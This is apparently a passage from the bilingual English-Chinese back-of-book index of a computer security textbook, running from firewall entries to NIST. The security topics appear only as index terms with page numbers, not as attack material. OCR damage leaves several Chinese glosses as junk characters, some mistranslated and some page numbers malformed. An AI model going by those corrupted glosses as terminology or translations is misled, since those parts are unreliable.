application protocol (应 用 层 协议 )，307 

basing ( 打 基 础 )，314-317 

bastion host (#481), 315 

characteristics and access policy (特征 和 访问 策略 )， 
306-307 

circuit-level gateway or circuit-level proxy (电路 级 
网 关 或 电路 级 代理 )，313-314 

distributed (分 布 式 )，320 

DMZ networks ( 非 军 事 区 网 络 ，DMZ 网 络 )， 
317-319 

host-based (基于 主机 的 )，315-316 

IP address and protocol values ( IP 地 址 和 协议 值 )， 
306 

limitations (局 限 )，307 

location and configurations (位置 和 配置 )，317- 
322 

need for (需要 )，305-306 

packet filtering( 包 过 滤 )，309-312 

personal (个 人 )，316-317 

scope of ( 域 )，307 

stateful inspection (状态 检测 )，312 

types of (类 型 )，308-314 

users identity, access based on (用 户 识别 ， 基 于 
访问 的 )，307 

virtual private networks ( VPN， 虚 拟 专 用 网 )， 
319-320 


First-generation scanner (第 一 代 扫 描 器 )，231 
Fixed database roles (固定 数据 库 角 色 )，172 

Fixed server roles (固定 服 务 器 角色 )，172 

Flash crowd( 突 发 访问 )，259 

Flood ( 洪 泛 )，539 

Flooders ( DoS client) ( 洪 泛 攻击 程序 (DoS 客户 


端 ))，201 


Flooding attacks ( 洪 泛 攻 击 )，248-250 


defenses against (防御 )，261 

ICMP flood (ICMP 洪 泛 )，249 

TCP SYN flood (TCP SYN 洪 泛 )，250 
UDP flood (UDP #£%2), 249 


Foreign key (SP), 161-162, 170 
Format (430), 233, 268, 279, 282, 291-293, 297, 


300, 351, 363, 370, 372, 374, 377, 386, 


427, 589, 592-593, 595, 605-606, 618, 639, 
673, 694-697, 710-711, 716, 722-723, 741-742, 
765-766, 

Format string overflows (格式 字符 串 溢出 )，370 

Forward add round key transformation ( 正 向 轮 密 钥 
加 变换 )，650 

Forward mix column transformation( 正 向 列 混合 变 
换 )，650 

Forward shift row transformation ( 正 向 移行 变换 )，648 

Forward substitute byte transformation (1E [a 73 & 
RAE), 648 

Fourth-generation products (第 四 代 产 品 )，232 

Fraggle program (Fraggle 程序 )，258 

Fragmentation (存储 碎片 )，702 

FreeBSD, 82-83, 127 

FTP (文本 传输 协议 )，287，312 

Fujita Tornado Intensity Scale (Fujita 龙卷风 强度 表 )， 
538 

Full virtualization (全 虚拟 化 )，433，435 

Functionality (功能 )，456 

Functional requirements, IT security (功能 需求 ，IT 
KR), 25-27, 471-473 

Function call mechanisms, buffer overflow (PĀ % da 
用 机 制 ， 缓 冲 区 溢出 )，343-344 

Function returns (函数 返回 )，343 

Fuzzing (模糊 )，390-391 

Fuzzing software tests (模糊 软件 测试 )，390-391 

Fuzzy logic (模糊 逻辑 )，277 

G 

Gardner, Martin (加 德 纳 ， 马 丁 )，59 

Gateways (网 关 )，260，313-314，585 

General role hierarchy (一 般 角 色 层 次 )，148 

Generic decryption(GD) )technology( 通 用 解密 技术 )， 
232-233 

Genetic algorithms (遗传 算法 )，277 

getinp() function (getinp() PH), 349 

gets() function ( gets() PA 4X), 339-340, 342, 346, 
348-349, 361 

gets() library routine (gets() ÆHF), 368 

Global data area overflows (全 局 数据 区 溢出 )， 
370-371 

GNOME Programming Guidelines ( GNOME 编程 指 
导 )，407 

Gpcode Trojan (Gpcode 木马 )，221 
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Graceful failure (优雅 的 失败 )，361 
GRANT command (GRANT 命令 )，169-170 
Graphical user interfaces GUIs (图 形 用 户 界 面 )，606 
grep program (grep 程序 )，398 
Group (组 )，5，59，117，125-127，172，184，268- 
269, 277, 291, 395, 399-401, 428, 431, 445, 
466, 474, 499, 508, 512, 518, 543, 551- 
552, 562, 591, 602, 624, 639, 687, 697, 
726, 734, 739, 742, 746, 750 
Group keys (444), 751, 753-757, 759 
Group master keys GMK (组 主 密 钥 )，756 
Group temporal key GTK (组 临时 密 钥 )，756 
Guard pages (保护 页 )，365 
Guest OS (客机 操作 系统 )，433-436 
H 
Hacker/cracker ($), 79, 85, 187, 268-269, 
294, 323 
Hacking projects (MAINA), 763 
Hacktivists (黑客 分 子 )，269 
Handling of program input (程序 输入 处 理 )，380-391 
Handshake Protocol (握手 协议 )，702-705 
Hardware (硬件 )，18，22，177 
efficiency (效率 )，660 
information system (fA BRE), 535-536 
Hashed passwords (#34), 80-83 
Hash functions ( 散 列 函数 ) 
applications of (应 用 程序 )，55 
collision resistant (碰撞 抵抗 )，53 
HMAC, 675, 679 
intrusion detection of (入侵 检测 )，55 
MDS message digest algorithm ( MD5 消息 摘要 算 
法 )，696 
message authentication and (消息 认证 )，47-55 
one-way ( 单 向 ) 50, 52-53, 78, 82, 670, 765 
preimage resistant (抗原 象 )，53-54 
second preimage resistant (第 二 抗原 象 )，53 
Secure Hash Algorithm (SHA， 安 全 散 列 算法 )， 
672-675 
simple SHF (简单 散 列 函数 )，670-672 
Heap (HE), 367 
Heap overflow ( 堆 滋 出 )，367-370 
hello function (hello 函数 )，345，347-348 
Hierarchies RBAC (层次 RBAC)，132 
High confidence (高 机 密 性 )，548 
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High interaction honeypot (S XEHE), 294 
HMAC, 52, 657-659 
algorithm (43%), 676-678 
design objectives for (设计 对 象 )，676 
security of (安全 性 )，678-679 
Honeynet project ( 蜜 网 项 目 )，294 
Honeypots (WHE), 294-296 
fully internal (£ ABB), 296 
high interaction (高 交互 )，294 
low interaction 〈 低 交互 )，294 
outside the external firewall (外 部 防火 墙 之 外 )，295 
Host attacks (主机 攻击 )，105 
Host audit record HAR (主机 审计 记录 )，282 
Host-based behavior-blocking software (基于 主机 的 
行为 屏蔽 软件 )，233 
Host-based detectors (基于 主机 的 检测 器 )，290 
Host-based firewalls (基于 主机 的 防火 墙 )，315-316 
Host-based IDSs (基于 主机 的 人 侵 检测 系统 )，231- 
232, 234, 273, 278, 281, 282, 570 
anomaly (异常 的 )，279-281 
benefit of (优势 )，278 
data sources (数据 源 )，278-279 
distributed (分 布 式 )，281-283 
sensors (感应 器 )，278-279 
signature or heuristic based (基于 特征 或 启发 式 
的 )，281 
Host-based intrusion prevention systems (HIPS, 基 
于 主机 的 人 侵 防护 系统 )，322-324 
Hosted virtualization〈 主 机 虚拟 化 )，433-434，436 
Host input/output (主机 输入 /输出 )，323 
Host-resident firewall (主机 驻 留 防火 墙 )，320 
HTTP food (HTTP 洪 泛 )，253 
HTTP over SSL (HTTPS), 223-224, 705-707 
connection closure (连接 关 闭 )，706-707 
connection initiation (连接 初始 化 )，706 
Human attack surface (人 为 攻击 面 )，31 
Human factors of computer security (计算 机 安全 的 
人 为 因素 ) 
awareness, training and education for( 意 识 ， 训 练 ， 
教育 )，557-562 
computer security incident response team ( CSIRT， 
计算 机 安全 事件 响应 团队 )，567-574 
email use policies (邮件 使 用 策略 )，566-567 
employment practices and policies (雇用 实践 和 策 


略 )，563-565 
Internet use policies (互联 网 使 用 策略 )，566-567 
Human-caused threats (人 为 导致 的 威胁 )，543 
prevention and mitigation measures (预防 和 缓解 措 
施 )，545-546 
Humidity (湿度 )，539-540 
Hurricanes (飓风 )，537 
Hybrid cloud (混合 云 )，184 
Hydraq Trojan (Hydraq 木马 )，220 
Hypertext Transfer Protocol based attack (基于 超 文 
本 传输 协议 的 攻击 )，253-254，287 
Hypervisor (管理 程序 )，228-229，420，433-436 
Hypervisor security (管理 程序 安全 )，435-436 
| 
Ice storm (UKE), 538 
ICMP flood attack (ICMP 洪 泛 攻击 )，249 
Identification (WA iE), 4, 26, 73, 94, 96-98, 230, 
260, 277, 472, 499-501, 521, 527, 754 
Identifier (444 ID), 78, 80 
Identifier and Access Management system (身份 和 访 
问 管理 系统 )，146，190 
Identity, credential, and access management (ICAM, 
身份 、 证 书 和 访问 管理 ) 
access management (访问 管理 )，142 
credential management (证 书 管理 )，141-142 
identity federation (身份 联盟 )，143 
identity management (身份 管理 )，141 
purpose of (目的 )，140 
identity federation (身份 联盟 )，143 
identity management (身份 管理 )，141，620-621 
identity providers (身份 提供 商 )，146 
identity service provider (身份 服务 提供 商 )，146 
identity theft (身份 盗用 )，225-226，733 
IDS (入 侵 检测 系统 ) 
IEEE code of ethics (IEEE 道德 规范 )，631 
IEEE (Institute of Electrical and Electronic Engineers) 
(电气 和 电子 工程 师 协会 )，1363 
standard for public-key Cryptography (标准 公 钥 加 
密 )，60 
IEEE 802.11 Wireless Lan ( IEEE 802.11 无 线 局 域 
网 )，739 
network components and architectural model (网 络 
组 件 和 架构 模型 )，742-743 
protocol architecture (协议 架构 )，740-742 


services (服务 )，743-745 
IEEE 802.11X, 734, 750-751, 753, 755 
IETF public key infrastructure X.509 ( PKIX ) model 
(IETF 公 钥 基础 X.509 AY), 726 
Immutable audit (相互 认证 )，626 
Imperva Web Application Attack Report ( Imperva 
Web 应 用 攻击 报告 )，163 
Implementation plan (实现 计划 ),，487，516-517， 
524-525, 531 
Inhand attack (内 带 攻 击 )，166 
incapacitation (失效 )，20-21 
Incident (事件 )，569 
Incident handling (事件 处 理 )，526，528，567-568， 
556-557, 567-574 
Independent BSS (独立 基本 服务 集 )，743，746，751 
Infected content (感染 内 容 )， 参 见 Viruses 
Infection vector (感染 向 量 )，205 
Inference (推理 ， 推 测 )，20，173-176 
channel (通道 )，174 
database security (数据 安全 )，173-176 
detection at query time (查询 时 探测 )，175 
detection during database design (数据 库 设计 时 探 
测 )，175 
example (示例 )，175 
threat of disclosure by (泄露 的 威胁 )，175 
inferential attack (推理 攻击 )，167 
infestation (4222), 542 
inflexibility (灵活 性 )，176 
informal approach, security risk assessment ( 非 正式 
方法 ， 安 全 风险 评估 )，494 
Information (信息 )，454 
defined (定义 )，13n1 
Information Assurance and Security (信息 保险 和 安 
全 ), 6 
Information Card Foundation (信息 卡片 基金 会 )，145 
Information leakage (信息 泄露 )，475 
Information system (信息 系统 )，5$35，578， 
security (安全 )，535 
Information system hardware (信息 系统 硬件 )，535-536 
Information technology security control (信息 技术 安 
全 控制 )，516-524 
implementation of (实现 )，525-526 
maintance and monitoring of implemented controls 


(实现 控制 的 维护 和 监控 )，526-528 
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Information technology security management (信息 技 
术 安 全 管理 )，485-512，516，525-526，528，573 
definition (定义 )，487 
implementation of (实现 )，516 
ISO/IEC 27000 series of standards ( ISO/IEC 27000 
系列 标准 )，487 
organizational context and security policy (组 织 上 
下 文 和 安全 策略 )，489-492 
overview of (概况 )，488 
safeguard (防护 )，1$，492，5$16-524，558，635 
information technology security plan (信息 技术 安全 
计划 )，524-525 
implementation of (SEH), 525-526 
information technology security risk assessment 
process (信息 技术 安全 风险 评估 过 程 )，488 
baseline approach (基线 方法 )，493-494 
combined baseline, informal, and detailed approach 
(联合 基线 、 非 正式 的 、 详 细 的 方法 )，495 
information theft (信息 窃取 ) 
credential theft (信用 窃取 )，224-225 
data exfitration (数据 exfitration), 224-225 
espionage (间谍 )，226 
identity theft (身份 窃取 )，225-226 
keyloggers (键盘 记录 )，224-225 
phishing (ff 冒 ， 钓 鱼 )，192，200，202-203， 
218-219, 224-226, 271, 330, 614 
reconnaissance (侦查 )，226 
spyware 《间谍 软件 )，224-225 
Infrastructure as a Service IaaS (基础 设施 即 服务 )，183 
Infrastructure controls (基础 设施 控制 )，522 
Infrastructure security (基础 设施 安全 )，535 
Infringement, intellectual property and (侵权 ， 知 识 
产权 )，615-616 
ingress monitors (进入 监控 )，234-235 
injection attack( 注 人 攻击 )，163-168，382-386 
inline sensor (内 联 传感器 )，284，297 
input fuzzing (输入 fuzzing), 390-391 
insecure interfaces (不 安全 接口 )，187 
inside attack (内 部 攻击 )，19 
Institute of Electrical and Electronic Engineers code of 
ethics (电气 和 电子 工程 师 协 会 规范 编码 )，629 
instructor resource center (指导 资源 中 心 )，8 
integer overflows (整数 溢出 )，370 
integrity (完整 性 )，13，15，22-23，109 
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system and information (系统 和 信息 )，27 
integrity check value (完整 性 校 验 值 )，710 
integrity confinement (完整 性 约束 )，451 
integrity verification procedures (完整 性 认证 过 程 )，452 
Intel digital random number generator DRNG ( Intel 
数字 随机 数 生成 器 )，66 
intellectual property (知识 产权 )，615 
copyrights (版 权 )，615 
Infringement (侵权 )，615-616 
patents (专利 )，615，617 
relevant to network and computer security (相关 网 
络 和 计算 机 安全 )，617-618 
trademark (商标 )，617 
types of (类 型 )，615-617 
U.S. Digital Millennium Copyright Act (美国 数字 
千年 版 权 法 案 )，618-619 
interception (拦截 )，20，234，596，613，623 
interface (#2101), 309 
international convention on cybercrime (针对 网 络 犯 
罪 国际 会 议 )，612 
international organization for standardization (国际 标 
准 化 组 织 )，3，10，162，470，486-487，520， 
558, 563-565, 583-585, 623 
international telecommunication union (国际 电报 联 
98), 9, 579, 607, 724 
Internet Architecture Board ( Intenet 体系 结构 委员 
2), 9, 709 
Internet authentication (Internet 认证 ) 
Kerberos, 718-724 
public-key infrastructure ( 公 钥 基础 设施 )，727-729 
X.509, 724-727 
Internet banking server (Internet 银行 服务 器 )，33 
Internet Engineering Task Force ( Internet 工程 任务 
48), 9, 728 
public-key infrastructure X.509 ( 公 钥 基础 设施 
X.509 ), 728-729 
Internet mail architecture ( Internet 邮件 体系 结构 )， 
697-699 
Internet Message Access Protocol (IMAP, Internet 
消息 访问 协议 )，287 
Internet protocol security ( Internet 协议 安全 )， 参 见 
IPsec . 
Internet Relay Chat (Internet PHEMIK), 252, 287 
network (网络 )，233 


Intenet security protocol (Internet 安全 协议 )， 参 见 
IPsec 
Domainkeys Identified Mail (域名 认证 邮件 )， 
697-700 
HTTPS, 705-712 
IPv4 and IPv6 security (IPv4 和 IPv6 安全 )，707-712 
Multipurpose Internet Mail Extensions (多 用 途 网 
际 邮件 扩展 )，694 
secure sockets layer (安全 套 接 层 )，701-705 
transport layer security (传输 层 安 全 )，701 
Internet Service provider (Internet 服务 提供 商 )，305 
Internet Society (Internet 协会 )，9 
Internet use policies (Internet 使 用 策略 )，566-567 
Interposable libraries (fH AFF), 595-598 
Interposable library function (4# A J# RX), 597-598 
Intruders (A(2#), 268-272 
behavior (474), 270-272, 274 
classes of (类 别 )，268-269 
cyber criminals (网 络 犯罪 )，268-269 
definition (X), 268 
hacktivisits (激进 分 子 )，269 
initial access (初始 访问 )，271 
intrusion detection (人 侵 检测 )，272-275 
maintaining access (保持 访问 )，271 
privilege escalation (特权 扩 大 )，271 
range of attacks (攻击 范围 )，270 
skill levels (技术 等 级 )，269-270 
target acquisition and information gathering (目标 
获取 和 信息 收集 )，270 
Intrusion (入侵 )，20 
intrusion detection and prevention system (人 侵 检测 
和 预防 系统 )，322 
intrusion detection exchange protocol (人 侵 检 测 交换 
协议 )，292 
intrusion detection message exchange format (人 侵 检 
测 消息 交换 格式 )，292 
intrusion detection system (入 侵 检测 系统 ) 
exchange format (交换 格式 )，291-293 
intrusion detection exchange protocol (人 侵 检 测 交 
换 协 议 )，292 
intrusion detection message exchange format (人 侵 
检测 消息 交换 格式 )，292 
intrusion management (人 侵 管理 )，192-193 
intrusion prevention systems (人 侵 预 防 系统 )，192， 





270, 322-326, 570 
distributed or hybrid (分 布 式 或 混合 型 )，324-326 
host-based (基于 主机 )，322-324 
network-based (基于 网 络 )，324 
snort inline (snort 内 联 )，326 
unified threat management (统一 威胁 管理 )，326- 
330 
Inverse Add Round Key Transformation (逆向 轮 密 钥 
加 变换 )，651 
Inverse Subtitue Bytes Transformation ( 逆 字 节 代 换 
变换 )，648 
invite request (邀请 请 求 )，252-253 
invocation property (请 求 资源 )，451 
invoke (请 求 )，451 
IP address spoofing (IP 地 址 欺骗 )，311 
IP destination address (IP 目的 地 址 )，709 
IP protocol field (IP 协议 字段 )，309 
IPS (A {3 fi BY K BE), A J Intrusion prevention 
systems 
IPsec platform (IPsec 平台 )，319 
IPsec protocol model (IPsec 协议 模型 )，710 
IP security (IP &4), 62, 408, 722 
applications of (应 用 程序 )，707-708 
Authentication Header (认证 头 部 )，709 
benefits (优势 )，708 
encapsulating security payload (封装 安全 负载 )， 
710-712 
routing applications (路 由 程序 )，708-709 
scope of (范围 )，709 
security association (安全 关联 )，709-710 
iptables program (iptables 程序 )，429 
IPv4，287，707-712 
IPv6, 259, 707-712 
iris biometric authentication system (虹膜 生物 认证 
RA), 97, 105-107 
iris-recognition camera (虹膜 识别 摄像 头 )，106 
ISO 27002, 557-558, 563-565, 584-585, 623 
ISO/IEC 27002 security controls ( ISO/IEC 27002 安 
全 控制 )，520 
isolation (隔离 )，30，458 
issuer name (发 行商 名 称 )，723 
IT security management (IT 安全 管理 )， 套 见 Infor- 
mation technology 
IT security plan (IT 安全 计划 )， 参 见 Information 


583 


technology (IT) security plan 
ITU Telecommunication Standardization Sector (ITU 
电信 标准 部 门 )，9，607，722 
J 
journeyman (AZT), 269 
K 
Kerberos environment (kerberos #4%), 720 
Internet authentication and (互联 网 认证 )，716-722 
performance issues (性 能 问题 )，722 
ticket-granting Service (票据 授予 服务 )，718 
ticket-granting ticket (票据 授予 票据 )，718-720 
version 4 and 5 (版 本 4 和 版 本 5), 721-722 
Kerberos protocol (kerberos 协议 )，716-720 
Kerberos server (kerberos 服务 器 )，720 
kemel (内 核 )，124，227-229，234，236，345，352， 
364, 417-418, 421, 429, 431, 458, 599-600 
Kernel mode (ASK), 124, 227-228, 599 
Kernel moderootkits (内 核 模式 rootkits), 228 
key distribution center ( 密 钥 分 发 中 心 )，663 
key distribution, symmetric encryption ( 密 钥 分 发 ， 
对 称 加 密 )，662-664 
keyd hash MAC ( 密 钥 散 列 MAC), 51-52 
key expansion ( 密 钥 扩展 )，651 
key generation ( 密 钥 生 成 )，468 
keyloggers (键盘 记录 器 )，201，224-226 
keylogging (键盘 记录 )，223 
key management ( 密 钥 管理 )，60-64，66-67，176， 
189, 471, 707, 710, 750-751, 753-759 
key pair recovery ( 密 钥 对 恢复 )，727 
keys ($4) 
group (41), 751, 753-757, 759 
pairwise (成 对 )，753-756 
public (254Ł), 56, 60, 686, 688, 725 
keystream (A7), 47, 652 
Klez mass-mailing worm ( Klez 大 规模 邮件 蠕虫 )， 
218，221 
known session ID (已 知 会 话 ID )，34 
L 
laboratory exercises (实验 室 练习 )，766 
LAN monitor agent (局 域 网 监控 代理 )，283 
Laptop data encryption (笔记 本 电脑 数据 加 密 )，67 
LavaRnd, 65 
law enforcement agencies (执法 机 构 )，612 
layering (分 层 )，30 
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leaky system resources (脆弱 系统 资源 )，18 
least astonishment (最 少 惊动 )，31 
least common mechanism (最 少 共用 机 制 )，29 
least privileges (最 少 特 权 )，29，400-402，565 
legal aspects of computer security (计算 机 安全 的 法 
fE Fr TH), 5-6, 14, 35, 114, 188, 244, 263, 
294, 484-491, 493, 497, 508, 510, 523, 568 
cybercrime and (网 络 犯罪 )，611-615 
ethical issues (规范 问题 )，626-632 
intellectual property and (知识 产权 )，615-621 
primacy and (隐私 )，621-626 
level of risk (风险 层次 )，19，295，492-493，498， 
501, 504-505, 509, 512-513, 523-524, 531 
liability (可 信和 度 )，558 
library ( 库 )，228，322，349 
anti-XSS ( 抗 XSS), 390 
dynamic (动态 的 )，370 
dynamic linked shared (动态 链接 共享 )，596 
dynamic loadable (动态 可 加 载 )，397，399 
dynamic loaded (动态 加 载 )，314 
dynamic binary rewriting (动态 二 进 制 重 写 )， 
598-600 
dynamic link libraries (动态 链接 库 )，279 
executable (TT $447), 430 
interposable (4A), 595-598 
safe (Z£), 362 
shared (共享 )，595-596 
standard (标准 )，351，360，362，365，399 
statically linked (静态 链接 )，595 
statically linked shared (静态 链接 共享 )，596 
TCP wrappers (TCP 包装 )，429 
third-party application (第 三 方 应 用 程序 )，351 
Library-based tape encryption (基于 库 的 磁带 加 密 )， 
67 
Library fuction( 库 函数 )，342，452，367-368，402- 
405，595-597，600 
Libsafe，362 
Lifecycle management (生命 周期 管理 )，141 
Lightning (闪电 )，538 
Likelihood (#8 14 PE), 35, 55, 85, 203, 216, 218, 
226, 325, 380, 391, 395, 403, 493-494, 496, 
501-505, 507, 509-512, 523, 526, 530, 544 
Limited role hierarchy (有限 角色 层次 )，131-132，148 
Link encryption ( 链 路 加 密 )，660-662 


Linux/Unix security (Linux/UNIX 安全 ) 
access control (访问 控制 )，428-429 
application and Service configuration (应 用 程序 和 
服务 配置 )，427 
application security using a chroot jail (使 用 chroot 
监牢 的 应 用 程序 安全 )，429-430 
logging and log rotation (日 志和 日 志 回 滚 )，429 
patch management (补丁 管理 )，427 
testing (测试 )，430 
troubleshooting a chroot application (调试 遇 到 问 
题 的 监牢 应 用 )，429-430 
users, groups and permissions (用 户 ， 组 ， 许 可 )， 
427-428 
Literary works, copyrighted (文学 作品 ， 版 权 )，616 
loadable modules〈 可 加 载 模块 )，599 
local area network LAN (本 地 局 域 网 )，20，109， 
184, 285, 287, 305, 319 
lock (#4), 405 
lockfile, software security (加 锁 文 件 ， 软 件 安全 )， 
405-407 
log (H), 80, 85, 101-102, 166, 193, 213, 272, 
280, 293-294, 296-298, 312-313, 326, 351, 
400, 422, 425-426, 429, 433, 445, 453, 
466-467, 527, 570, 578, 585-586, 588-594, 
598, 600-608, 626, 717, 719, 
log analysis (日 志 分 析 )，592 
tools (工具 )，570 
log file encryption (日 志文 件 加 密 )，592 
logger (日 志 记录 器 )，591 
logging function ( H AŽ), 425-426, 429 
at the application level (应 用 程序 级 别 )，594-595 
interposable libraries (插入 库 )，595-598 
Syslog (系统 日 志 )，591-594 
at the system level (系统 级 别 )，589-594 
Windows event log (Windows 事件 日 志 )，589-591 
logical link control (逻辑 链 路 控制 )，740-743 ，746 
logical security (逻辑 安全 )，535，547-553 
logic bomb (逻辑 炸弹 )，201，205，221-222 
logic bomber (逻辑 炸弹 )，205 
logon event (登录 事件 )，591 
low interaction honeypot (EZEK), 294 
LulzSec，269 
M 
machine readable zone (机 器 读 卡 区 )，93 














Mac OS security file delete progam ( Mac OS 安全 文 
件 删除 程序 )，404 
MAC protocol data unit ( MAC 协议 数据 单元 )，740- 
742, 744, 748, 750, 752, 756, 758, 761-762 
macro virus (ZJ), 201, 206, 208-210 
MAC Service data unit (MAC 服务 数据 单元 )，740- 
742, 744 
mail delivery agent( 邮 件 发 送 代理 )，699 
mail submission agent (邮件 提交 代理 )，698-699 
main function (= pA%&X), 349 
main routine (ESR), 368 
maintenance hook (维护 钩子 )，226 
maintenance of information systems (信息 系统 维护 )，26 
maintenance of security controls (安全 控制 维护 )，527 
malicious insiders (恶意 的 内 部 人 员 )，187-188 
malicious software (恶意 软件 )，281 
attack kits (攻击 工具 套件 )，202-203 
attack sources (攻击 源 )，203 
backdoor (后 [J ), 20-21, 201, 214-215, 226- 
227, 272, 330, 
bots (fH FHF), 222-224, 235, 253-254, 318, 632 
broad categories (粗略 分 类 )，200 
definition (ŒX), 200 
logic bomb (逻辑 炸弹 )，201，205，221-222 
mobile code (移动 代码 )，201，214，216-217 
rootkits, 201, 226-229, 234 
spreading of new (新 的 传播 )，223 
terminologies (专业 术语 )，201 
trojan horse (特洛伊 木马 )，21，104-105，201， 
215, 217, 219-220, 227, 268, 322, 452, 
458-459 
types (26%), 200-203 
malloc PIAL, 364, 368 
malvertising (恶意 广告 )，218 
malware (恶意 软件 ) 
management (FE), 293, 501-503, 506-507, 510-511 
access (访问)，142 
account (账户 )，591 
change (改变 )，527-528 
configuration (AEE), 22, 26, 28, 473, 478, 528 
content (W), 621 
controls (42l), 25, 35, 517, 519-522 
credential (44 FH), 141-142 
of data (AHF), 364, 368, 370 
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database ( 4 3% FE), 116, 118, 157-159, 166, 
168, 477 
digital rights management (数字 版 权 管理 )，619-620 
identity (身份 )，141，620 
identity and access management (身份 和 访问 管 
理 )，190 
intrusion (入 侵 )，192-193 
IT security (IT 2&4), 485-512, 516-517, 524- 
526, 528, 573 
key ($H), 60-64, 66-67, 176, 189, 471, 707, 
710, 750-751, 753-759 
memory (HFF), 364, 368, 370, 395, 449 
network (F4%), 185, 284, 734 
patch (hT), 427, 430 
rights (权利 ， 权 限 )，621 
risk (风险 )，492-493，498，508，512 
security information and event management (安全 
信息 和 事件 管理 )，193 ，291，604-605 
subsystem ( 子 系统 )，548 
trusted facility (可 信 设 备 )，478 
management-level training (管理 级 别 训 练 )，562 
manager (经理 )，293 
mandatory access control (强制 访问 控制 )，4，116， 
169，422，440，442，449 
man-in-the-middle-attack (中 间 人 攻击 )，688，733 
manual defensive coding practices (手工 防御 代码 实 
践 )，168 
Markovmodeling techniques (马尔 可 夫 模 型 技术 )，84 
Markov models (马尔 可 夫 模 型 )，277 
Markov process model (马尔 可 夫 过 程 模型 )，84， 
277，279 
Masquerade, security threat by (假扮 ， 安 全 威胁 )， 
20-21，24 
master (主要 的 )，269-270 
master session key ( 主 会 话 密 钥 )，753 
MDS, 54, 82-83, 678-679, 696, 724-725, 747, 756 
MDS crypt (MD5 加 密 )，82-83 
measured service (可 测量 的 服务 )，182 
medium access control (媒介 访问 控制 )，521，603， 
741-742，746 
Melissa mail worm (Melissa 邮件 蠕虫 )，214 
memory alocator (内 存 分 配器 )，370 
memory cards (内 存 条 )，90-91 
memory leak〈 内 存 泄漏 )，395-396 
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memory management unit (内 存 管 理 单元 )，364-365 
message confidentiality，symmetric encryption (消息 
保密 ， 对 称 加 密 )，637-664 
message/data authentication (消息 / 数据 认证 )，47-52 
code (编码 )，49-51，702 
a complex function of message and key (消息 和 密 
钥 的 复杂 函数 )，49 
key exchange/key management ( Diffe-Hellman 密 
钥 交 换 / BAH), 59, 63, 684-688 
hash function (#15) pA), 47-55 
HMAC, 52, 675-679 
RSA BYE, 679-684 
using a message authentication code (使 用 消息 认 
证 编码 )，49-50 
using a one-way hash function (使 用 单 向 散 列 也 
数 )，50-52 
using public-key encryption (使 用 公 钥 加 密 )，50，52 
using secret key (使 用 秘密 密 钥 )，51-52 
using symmetric encryption (使 用 对 称 加 密 )，48 
without confidentiality (不 具备 机 密 性 )，48-49 
without message encryption (未 进行 消息 加 密 )， 
48-52 
message digest (消息 摘要 )，50，54，672-673，675， 
689, 694, 696, 758 
message integrity (消息 完整 性 )，702，758 
message integrity code (消息 完整 性 编码 )，746， 
755-756, 758 
message store (消息 存储 )，699 
message transfer code (消息 传输 代理 )，699 
message user agent (消息 用 户 代理 )，698 
metamorphic virus (病毒 变种 )，209 
metamorphic worm (蠕虫 变种 )，216 
Michael (迈克 尔 )，747，755，758 
Miller, Barton Kh, Et), 391 
MIME (多 用 途 互联 网 邮件 扩展 类 型 )，694-695 
minimal effect on functionality (对 功能 影响 最 小 
化 )，583 
misappropriation (盗用 )，20-21 
misuse( 滥 用)，20-21，156-157，275，472-473，520， 
536, 543, 546, 563, 607, 613, 624, 627, 724 
mix columns ( 列 混淆 )，646 
mix columns transformation ( 列 混 淆 变换 )，650 
mixter (混合 器 )，251 
MLS (多 层次 安全 )， 参 见 Multilevel security 


mobile code (移动 代码 )，210，214，216-217 
mobile device security (移动 设备 安全 )，735-739 
mobile phone trojans (移动 手机 木马 )，220-221 
mobile phone worm (移动 手机 蠕虫 )，217 
mobility (移动 性 )，732 
mode (模式 )，28，45-46，48，56，120，124，130， 
205, 213, 227-229, 285, 297, 307, 317, 
438, 442, 444, 449, 451, 569, 586, 596, 
599, 655-660, 671, 710-712, 747, 758 
model (AY), 17-19, 29, 42, 74-75, 84, 116, 120- 
124, 130-131, 133-134, 136-139, 145-147, 160- 
161, 168, 179, 181-182, 185-187, 189, 212- 
213, 276-277, 292-293, 308, 312, 376, 378, 
392, 396, 409, 431, 440-456, 479, 489, 
525, 549, 552-553, 558, 579-581, 619-620, 
638, 699, 701, 725-727, 740, 742-743 
modes of operation (操作 模式 )，46 
symmetric encryption (对称 加 密 )，655-660 
modification of message (消息 更 改 )，24 
modification right (更 改 权 )，616 
modify (更 改 )，451 
modularity (模块 化 )，30 
monitoring, analysis and response system (监控 ， 分 
析 ， 响 应 系统 )，606-607 
monitoring risks (监控 风险 )，526-528 
Morris, Robert ( 莫 尔 斯 ， 罗 伯 特 )，213 
Morris (蠕虫 )，213，342，349 
motion picture, copyright (电影 ， 版 权 )，616 
motivation (动机 )，500 
MPDU exchange (MPDU 交换 )，752 
Multics, 449 
multi-instance model of data protection (数据 保护 的 
多 路 实例 模型 )，189 
Bell-Lapadula model for computer security ( 计 算 
机 安全 的 Bell-Lapadula 模型 )，440-450 
Biba integrity model of computer security (计算 机 
安全 的 Biba 完整 性 模型 )，451-452 
Chinese wall model (中 国 墙 模型 )，454-456 
Clark-Wilson model of computer security (计算 机 
安全 的 Clark-Wilson 模型 )，452-453 
database security (数据 库 安 全 )，461-466 
information technology security evaluation ( 信 息 
技术 安全 评估 )，470-476 
RFC 2828 (定义 )，459 


role-based access control system (基于 角色 的 访问 
控制 系统 )，460-461 
trusted computing (可 信 计 算 )，466 
multipartite virus (多 成 分 病毒 )，208 
multiple encodings (多 重 编码 )，389 
multiple password use (多 重 口 令 使 用 )，79-80 
multi-purpose Internet mail extension MIME (多 用 途 
互联 网 邮件 扩展 )，694-697 
multi-tenant model of data protection (数据 保护 的 多 
用 户 模式 )，189 
multivariate model (多 元 模型 )，276 
music works copyrights (音乐 作品 版 权 )，616 
mutually exclusive roles (相互 排他 角色 )，132-133 
Mydoom，215 
N 
national ID cards (£ ID 卡 )，93 
National Institute of Standard and Technology ( 美 
国 国 家 标准 与 技术 研究 院 )，9，29，37，43， 
54, 59, 1110, 128, 412, 512-513, 532, 
554, 608, 643, 672, 688 
buffer overflow (缓冲 区 溢出 )，338 
computer security handbook (计算 机 安全 手册 )， 
12, 36, 476 
deployment model (72422! ), 183-185 
guideline on cloud security and privacy issues and 
recommendations( 云 安全 和 隐私 问题 的 指导 
和 推荐 )，191 
glossary of key information security terms (IR 
7298， 关 键 信息 安全 术语 词汇 表 )，114 
program of standarding encryption and hash 
algorithms (标准 加 密 和 散 列 算法 程序 )，29 
security requirement for cryptographic modules ( 密 
码 学 模块 安全 要 求 )，128 
Service models (服务 模型 )，182-183 
electronic authentication guideline ( SP 80-63-2 电 
子 认证 指导 )，74 
